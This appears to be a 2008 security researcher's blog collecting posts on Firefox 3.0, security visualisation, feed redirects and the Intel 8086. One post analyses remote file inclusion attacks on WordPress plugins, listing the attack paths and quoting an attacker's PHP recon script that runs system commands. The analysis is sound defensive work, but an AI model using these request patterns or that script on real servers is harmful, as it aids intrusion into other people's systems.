Static in the Ether

Some two and a half hours into the FF3.0 download campaign, and the toll is beginning to show.spreadfirefox.com seems to be refusing connections. While individual mirror sites seem up, it looks like the counts are going via some redirector script. getfirefox.com is however working fine.

The impact its having on mirrors seems to be quite intense. The following two images sow traffic stats from mirror.ac.za the mirror service run by TENET here in South Africa.

Update:

A Firefox 3.0 download counter is now available. 943806 currently averaging some 7000/minute. Some commentary on the outages, although they seem to have cleared.

Today is the official launch of the Firefox 3.0 Browser. the 24 Hour period form June 17th to June 18th will be a a record attempt in order to get into the Guinness book of Records, for the most software downloads in a day. The day apparently starts on Tuesday, June 17th after 10am PDT.

This Aside, I think the upgrade is well worth it , and I’ve been more than happy since Beta2 when I move my primary system over to running 3.0. The biggest improvements being rendering when switching between tabs ( and I usually have LOTS of tabs) and memory usage.

Tomorrow regular programming resumes ;)

The Proceedings of the 2007 Workshop on Visualization for Computer Security (VizSec 2007) are finally available. Springer Has the book available for order at a princely 60 Euros. Amazon has the book listed but not yet available for shipping , but one can pre-order. For those interested, Springer has a flyer and table of contents available. PDF versions of the presentations given are available form the VizSec 2007 website.

My copy should hopefully be arriving in the next few weeks, but I’m looking forward to the Work done by John R Goodall, Gregory Conti and Kwan-Liu Ma as editors. I’m just sorry I’m not going to make VizSec 2008 this year.

The two papers that I presented are (links to the PDF slides):

• High level Internet Scale traffic visualization using Hilbert curve mapping - Barry Irwin and Nick Pilkington. This details the initial work we did using the Hilbert Curve Analysis tool for IP networks
• Using InetVis to evaluate Snort and Bro scan detection on a network telescope - Barry Irwin and Jean-Pierre van Riel. InetVis is the result of three years of JP’s work to build a scalable 3-D vizualisation tool for network traffic — primarily that collected by network telescopes.

DAVIX is the upcoming live CD for data analysis and visualization, which will be released at Blackhat/DEFCON in Las Vegas this summer, with another talk at VizSec 2008. From the VizSec.org announcement:

Jan Monsch and Raffael Marty and I have prepared the second beta version of DAVIX. And are now seeking for beta testers that have the time to test DAVIX and answer the questionnaire that comes along with the beta version. All completely filled out questionnaires received by me until Monday 23 June 2008 18:00 UTC will enter a raffle for one autographed copy of Raffy’s upcoming book “Applied Security Visualization”.

If you want to participate in the beta test please contact: jan.monsch ät iplosion.com

What makes me quite happy is that they have included InetVis as one of their four chosen visual analysis tools on the live CD.

I’ve been paying with this since this morning and so far so good.

Wired has a article on the Artwork done by MIT Media Lab’s grad student Alex Dragulescu. Working under contract to MessageLabs he has produced a number number of pictures, showing images of Mydoom, Ghost Keylogger and other bits of Malware.
While all quite pretty there seems to be no detail of how they were created in the original post although the MalWarez link on his homepage describes the process as follows:

..For each piece of disassembled code, API calls, memory addresses and subroutines are tracked and analyzed. Their frequency, density and grouping are mapped to the inputs of an algorithm that grows a virtual 3D entity.

The Storm Worm is probably my favorite visualizations. He also has an interesting set of images entitled SpamPlants, based on input relating to the ASCII character frequency of spam messages.

Now this sounds like a great project for an aspiring security researcher with a graphical bent.

Further to my previous post about using mod_rewrite to direct my old feed URLs to the right place, its probably time to notify people who read them in aggregators that the URI has changed, since the aggregators (particularly the web based ones hide the redirect, even tho its a 301). To the:

• 1 subscribers using Google FeedFetcher to grab /blog/index.php?flav=rss
• 6 subscribers using Google FeedFetcher to grab /blog/?flav=rss&category=Security
• 27 subscribers using Google FeedFetcher to grab /blog/?flav=rss
• 2 subscribers using Rojo to fetch /blog/?flav=rss
• 7 subscribers NewsGatorOnline to grab /blog/?flav=rss
• 1 subscriber using Feedshow to grab /blog/?flav=rss

First of all thank-you for your interest, but the links have changed. My full feed is available as RSS 2.0 or Atom 1.0, or a reduced Security only feed as RSS 2.0 ( but you miss out on the fun stuff).

This is why this post is actually tagged as security, so they get it too ;)

Following form my earlier post regarding a pre-compiled bibTeX database of all Internet RFCs, I discovered while browsing the CTAN archives that Richard Mortier wrote a awk script back in 2000 while at Cambridge Computing Lab, that does something similar. For purists who don’t trust this new fangled XML and XSLT stuff its available at:

http://www.ctan.org/tex-archive/biblio/bibtex/utils/misc/rfc2bib.awk

Or other CTAN mirrors closer to you.

Thirty years ago today (8 June 1978) , Intel unleashed the 8086 16-bit CPU on the world, some four years after the debut of the 8080 which powered the Altair computer (something I wish I could find to own!).
Computer world has a really nice writeup on the history and development of ver the last 30 years and corresponding brief time line

Intel’s own Microprocessor Hall of Fame describes the chip as:

A pivotal sale to IBM’s new personal computer division made the 8088 the brains of IBM’s new hit product–the IBM PC. The 8088’s success propelled Intel into the ranks of the Fortune 500, and Fortune magazine named the company one of the “Business Triumphs of the Seventies.”

Intel also has a nice image (300K) of the 8086 and 8088 die.

While purists will probably grumble about the horridness of the x86 family instruction set in comparison to some RISC and embedded controller instructions sets, it has proved highly scalable, and extensible over the last 30 years.

The other day morning stated out with a conversation with darb that went as follows:

DARB: so…wordpress hey?
BVI: I got over writing my own code
BVI: now I’m waiting for my blog to be 0wn3d
DARB: you know wordpress is the equivalent of an 8ft tall ogre that stands outside looking pretty, smashes tables when he tries to sit down, and needs 20kg of food every day…and offers little or no protection on the side entrance to your establishment?
BVI: exactly!
DARB: lolz
BVI: mine has a spiked collar and a beware of the ogre sign :-)
DARB: that only scares away legitimate users…bandits read that sign as “come on in, we left the side door open”
BVI: yeah
DARB: I love wordpress docs and plugins
DARB: “just chown your /tmp file, and then chmod 777 everything”

Well not 20 minutes later I noticed a number of Remote file inclusion attacks coming in. Nothing like the ogre having sent out an invite to all and sundry. Attacks were coming looking as follows:

• /blog/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /blog/archives/5/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /blog/archives/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=foo
• /blog/?flav=rss/wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
• /wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
• /blog/wp-content/plugins/myflash/myflash-button.php?wpPATH=foo
• /blog/archives/14/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo
• /blog/archives/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo
• /blog/archives/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=foo

In the above the actual path for the exploit codes been replaced with foo, but is of the form of http://site/somepath/tx.txt????, or similar.

Ive now seen this form over eighty different systems. The include file seems to vary ( see below) but the same plugins are being targeted. No real surprise as they have been known exploitable for a while.

• myflash < v1.1 01 May 2007 ISS-XForce
• wordtube < 1.43 01 May 2007 ISS X-Force
• mygallery ≤ v 1.2.1 29 April 2007 ISS-X-force FRsirt

All the requests were may using libwww-perl/5.810, so most likely come from compromised unix systems. the payload file being referred to has been removed, but I found some others, which are no doubt similar. The algorithm being used for the brute forcing is rather dumb. of the entries listed above, only two relate to viable targets for my given install. I found the request for “blog/?flav=rss/….” rather amusing. Another interesting observation is the number of requests centered around http://lair.moria.org/blog/archives/14 my post relating to Windows XP failing to hibernate. I have yet to see hits on any other particular posts.

Looking at the payload code form some of the other similar attacks, I found the following one interesting, as a more human driven recon script providing information for making a value judgment on the target site rather than an automated assault. (When will these people learn that StudlyCaps isn’t really that cool )

echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo “os: $os<br>”;
echo “uname -a: $alb<br>”;
echo “uptime: $alb2<br>”;
echo “id: $alb3<br>”;
echo “pwd: $alb4<br>”;
echo “user: $alb9<br>”;
echo “phpv: $alb6<br>”;
echo “SoftWare: $alb5<br>”;
echo “ServerName: $alb7<br>”;
echo “ServerAddr: $alb8<br>”;
echo “NigeriaN HackerS TeaM<br>”;

Others are not quite so benign, providing command shells, and in some cases drive by exploits using a number of different tools to try download further payloads onto the system or upload password files, webserver configurations and other sensitive information. c99madscript.php really seems to be the flavour of the month with these, although it has been around a while.

What all these attempts that Ive seen do have in common are the trailing “???” or “?????” irrespective of the payload contents of filename. The purpose of these to me is unclear, surely its a pain to type. Is it a bug ina script, or are people trying to do something else.

Having now migrated to Wordpress from my own very customised version of phpBloxsom, which ran the previous incarnation of this blog, Ive been left with the issue of dealing with all the sites pulling my RSS feeds. With the change of software has come a change of url for the location of the feeds.

Apache’s mod_rewrite seems to be the obvious candidate for making this as transparent as possible. In essence what needed to happen was incoming requests for:

"GET /blog/?flav=rss&category=Security HTTP/1.0" and
"GET /blog/?flav=rss HTTP/1.0" respectively need to be converted into:


http://lair.moria.org/blog/archives/category/security/feed

and

http://lair.moria.org/blog/feed respectively

This was achieved matching on the QUERY_STRING variable within apache. The real trick came trying to get the new URLS to appear clean. This proved to be more difficult than I expected. My initial rewrite rules resulted int he following:

"GET /blog/?flav=rss HTTP/1.0" 301 249 "
"GET /blog/feed/?flav=rss HTTP/1.0" 200 54274 ""

The agent was directed to the right url but it still looks ugly. Note the use of a HTTP/301 status code indicating permanently moved rather than a 302 which mod_redirect usually provides. The solution to the appending of the query string turned out to be to force my own null string onto the redirect. The Apache Wiki was where I finally found the right answer. so the way to remove a QUERY_STRING is to append a blank string “?” to the redirect .

The final setup in my .htaccess for Wordpress looks as follows:

RewriteCond %{QUERY_STRING} ^flav=rss$ [NC]
RewriteRule ^$ http://lair.moria.org/blog/feed? [R=301,L]
RewriteCond %{QUERY_STRING} ^flav=rss&(category)=Security$ [NC]
RewriteRule ^$ http://lair.moria.org/blog/archives/category/security/feed? [R=301,L]
RewriteCond %{QUERY_STRING} ^flav=atom$ [NC]
RewriteRule ^$ http://lair.moria.org/blog/feed/atom? [R=301,L]